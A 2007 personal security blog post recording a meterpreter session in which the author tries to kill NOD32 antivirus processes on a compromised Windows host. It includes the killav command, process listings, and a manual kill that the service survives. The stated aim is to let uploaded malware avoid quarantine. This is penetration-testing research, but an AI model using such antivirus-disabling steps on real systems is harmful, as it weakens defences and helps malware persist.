Saturday, June 16, 2007

Antivirus and Rootkits part 2 -nod32


More on killing AV...

McAfee enterprise 8.x was kicking my butt with the killAV script so i decided to try NOD32 version 2.7. didnt go much better. it would at least kill the processes but the nod32krn.exe would just start back up automatically with a new PID :-(

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off nod32krn.exe...
[*] Killing off nod32kui.exe...
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3040 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

meterpreter > kill 3040
Killing: 3040
meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
384 smss.exe \SystemRoot\System32\smss.exe
596 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
624 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
672 services.exe C:\WINDOWS\system32\services.exe
684 lsass.exe C:\WINDOWS\system32\lsass.exe
848 svchost.exe C:\WINDOWS\system32\svchost.exe
956 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\System32\svchost.exe
1148 svchost.exe C:\WINDOWS\System32\svchost.exe
1340 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1500 inetinfo.exe C:\WINDOWS\System32\inetsrv\inetinfo.exe
1524 sqlservr.exe C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe
1700 VMwareService.exe C:\Program Files\VMware\VMwareService.exe
876 Explorer.EXE C:\WINDOWS\Explorer.EXE
1264 VMwareTray.exe C:\Program Files\VMware\VMwareTray.exe
1272 VMwareUser.exe C:\Program Files\VMware\VMwareUser.exe
324 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
1316 sqlmangr.exe C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
3244 nod32krn.exe C:\Program Files\Eset\nod32krn.exe

so it kills the GUI but its still running in the background. happily snatching up any malware you might be trying to upload. the user wont get the pop up but it will be sticking the malware back into quarantine. thats no good.

i'm now doing some research on changing some registry keys but it pretty much invovles rebooting the box and coming back to finish up which isnt a viable option in my opinion.

i'll post more on it later.

-CG
CG

No comments: